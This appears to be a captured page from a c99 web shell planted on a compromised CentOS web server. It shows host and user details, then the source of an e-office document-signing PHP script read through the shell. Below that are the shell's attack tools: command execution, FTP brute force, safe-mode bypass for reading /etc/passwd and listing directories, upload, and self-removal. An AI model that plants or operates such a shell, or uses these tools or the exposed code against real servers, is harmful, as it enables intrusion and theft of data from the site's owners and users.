!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/manage/directorBCNU/eoffice/admin/   drwxr-xr-x
Free 50.88 GB of 127.8 GB (39.81%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     processSignDoc.php (5.6 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include_once("../../class/clsConnection.php");
include_once(
"../../class/clsDB.php");
include_once 
"../global.php";
include_once 
"../link/function.php";
include_once 
"../link/functionshow.php";
include_once 
"../class/clsDocType.php";
include_once 
"../class/clsDocattatchesTmp.php";
include_once 
"../class/clsDocuments.php";
include_once 
"../class/clsRunningDoc.php";
include_once 
"../class/clsDocattatches.php";
include_once 
"../class/clsDocReceiveSend.php";
include_once 
"../class/clsDocWSign.php";
include_once 
"../class/clsDocForSign.php";
include_once 
"../class/clsDocLineConfig.php";

$oC = new clsConnection($GLOBALS['DBHOST'], $GLOBALS['DBNAME_EOFFICE'], $GLOBALS['DBUSER_EOFFICE'], $GLOBALS['DBPASS_EOFFICE']);

$oDt = new doctype($oC);
$oDt1 = new doctype($oC);
$oDtmp = new DocattatchesTmp($oC);
$oDatt = new Docattatches($oC);
$oDoc = new Documents($oC);
$oRd = new runningdoc($oC);
$oRd1 = new runningdoc($oC);
$oRs = new DocReceiveSend($oC);
$oRs1 = new DocReceiveSend($oC);
$oRs2 = new DocReceiveSend($oC);
$oRs3 = new DocReceiveSend($oC);
$oDws = new docwsign($oC);
$oDfs = new DocForSign($oC);
$oDlc = new DocLineConfig($oC);

if(
$method=="addsign"){ 
    
$flagCommit true;
    
$oC->BeginTrans();
    
    
$oDoc->SearchByKey($DocID);
    if(
$oDoc->GetRecord()=="1"){
            
$oDoc->Edit();
            
$oDoc->DsID="3";
            
$flagCommit $oDoc->Save();
    }
            
$oRs->SearchByKey($DrsID);
            
$oRs->GetRecord();
            
$oRs->Edit();
            
$oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
            
//echo "DrsSendDate=".$oRs->DrsSendDate;
            
if($cansend!="Y"){
                
//$oRs->DrsSendPersonId=$DlcPsId;
                
$oRs->DrsSendPersonId='';
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendPersonId=$personId;
            }
            
//echo "DrsSendPersonId=".$oRs->DrsSendPersonId;
            
if($cansend!="Y"){
                
$oRs->DrsSendDlcID=$DlcPs;
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendDlcID=$DlcIDlogin;
            }
            
//echo "DrsSendDlcID=".$oRs->DrsSendDlcID;
            
$oRs->DrsSign=$DrsSign;    
            
$flagCommit $oRs->Save();
            
            
//---------------add DocReceiveSend
            
$oRs1->AddNew();
            
$oRs1->DrsID=$oRs1->GetNextCode();
            
$oRs1->DocID=$DocID;
            if(
$cansend!="Y"){
                
$oRs1->DlcID=$DlcPs;
            }else if(
$cansend=="Y"){
                
$oRs1->DlcID=$DlcIDlogin;
            }
            
$oRs1->DsID=3;
            
$oRs1->PtID=$oRs->PtID;
            
$oRs1->DrsDocTypeNo=$oRs->DrsDocTypeNo;
            
$oRs1->DrsReceiveDate=$oRs->DrsSendDate;
            
//$oRs1->DrsReceivePersonId=$DlcPsId;
            
$oRs1->DrsReceivePersonId='';
            
$oRs1->DrsDocDueDate=$oRs->DrsDocDueDate;
            
$oRs1->DrsDlcIDCreate=$DlcIDlogin;
            
$oRs1->DrsPsIDCreate=$personId;
            
$oRs1->DrsPropose=$oRs->DrsPropose;
            
$oRs1->DrsSign=$DrsSign;
            
$oRs1->DrsFromDrsID=$oRs->DrsID;
            
//echo "DrsFromDrsID=".$oRs1->DrsFromDrsID;
            
$oRs1->DocGroup=$oRs->DocGroup;
            if(
$cansend!="Y"){
                
$oRs1->DrsSend=$oRs1->DrsSend;
            }else if(
$cansend=="Y"){
                
$oRs1->DrsSend="Y";
            }    
            
$oRs1->AnID=$oRs->AnID;
            
$oRs1->DrsstartDatePost=$oRs->DrsstartDatePost;
            
$oRs1->DrsendDatePost=$oRs->DrsendDatePost;    
            
$flagCommit $oRs1->Save();
    
    if(
$DocForSign==&& $DocPID!="0"){
        
$oDlc->SearchByKey($DlcIDlogin); $oDlc->GetRecord(); 
        
$oRs2->SearchDeptSendDocforSign($oDoc->DocID);
        
$oRs2->GetRecord();
        
$oRs3->SearchByKey($oRs2->DrsFromDrsID);
        
$oRs3->GetRecord();
        
        
$oDfs->AddNew();
        
$oDfs->dfID=$oDfs->GetNextCode();
        
$oDfs->DocID=$oRs3->DocID;
        
$oDfs->DlcID=$oRs2->DrsDlcIDCreate;
        
$oDfs->DocGroup=$oRs3->DocGroup;
        
$oDfs->DlcIDsign=$DlcIDlogin;
        
$oDfs->DeptSign=$oDlc->deptId;
        
$oDfs->Save();
        
//echo $oRs8->DrsID.'--'.$oRs8->DrsDlcIDCreate.'--'.$oRs8->DrsPsIDCreate.'-'.$oRs8->DrsFromDrsID;        
    
}
            
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
    if(
$DocForSign==&& $DocPID!="0"){
        echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
    }else{            
        if(
$cansend=="Y"){
            if(
$oDoc->RsID!='2'){ $fn="showSendDoc.php"; }else{  $fn="showSendDocSR.php"; }
            echo 
"<meta http-equiv='refresh' content='0; URL=$fn?DocID=$DocID&DrsID=$oRs1->DrsID&cansend=$cansend'>";
        }else{                    
            echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
        }
    }
}else if(
$method=="addsignDocforSign"){ 
    
$flagCommit true;
    
$oC->BeginTrans();
    
    
$oDoc->SearchByKey($DocID);
    if(
$oDoc->GetRecord()=="1"){
            
$oDoc->Edit();
            
$oDoc->DsID="3";
            
$flagCommit $oDoc->Save();
    }
            
$oRs->SearchByKey($DrsID);
            
$oRs->GetRecord();
            
$oRs->Edit();
            
$oRs->DrsSendDate=getNowDateTh()." ".date('H:i:s');
            if(
$cansend!="Y"){
                
$oRs->DrsSendPersonId='';
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendPersonId=$personId;
            }
            if(
$cansend!="Y"){
                
$oRs->DrsSendDlcID=$DlcPs;
            }else if(
$cansend=="Y"){
                
$oRs->DrsSendDlcID=$DlcIDlogin;
            }
            
$oRs->DrsSign=$DrsSign;    
            
$flagCommit $oRs->Save();
            
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
                                    
        echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php'>";
}else if(
$method=="addWsign"){ 
    
$flagCommit true;
    
$oC->BeginTrans();
    
            
$oRs->SearchByKey($DrsID);
            
$oRs->GetRecord();
            
$oRs->Edit();
            
$oRs->DrsWSign='Y'
            
$flagCommit $oRs->Save();

            
$oDws->AddNew();
            
$oDws->wID=$oDws->GetNextCode();
            
$oDws->DocID=$oRs->DocID;
            
$oDws->DrsID=$DrsID;
            
$oDws->signDateTime=getNowDateTh()." ".date('H:i:s');
            
$oDws->DlcID=$oRs->DlcID;
            
$oDws->personId=$oRs->DrsReceivePersonId ;
            
$oDws->DocSign=$DrsSign;
            
$oDws->DocGroup=$oRs->DocGroup;
            
$flagCommit $oDws->Save();
            
    
            if(
$flagCommit)
                
$oC->CommitTrans();
            else
                
$oC->RollbackTrans();
    echo 
"<meta http-equiv='refresh' content='0; URL=signDoc.php'>";    
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.014 ]--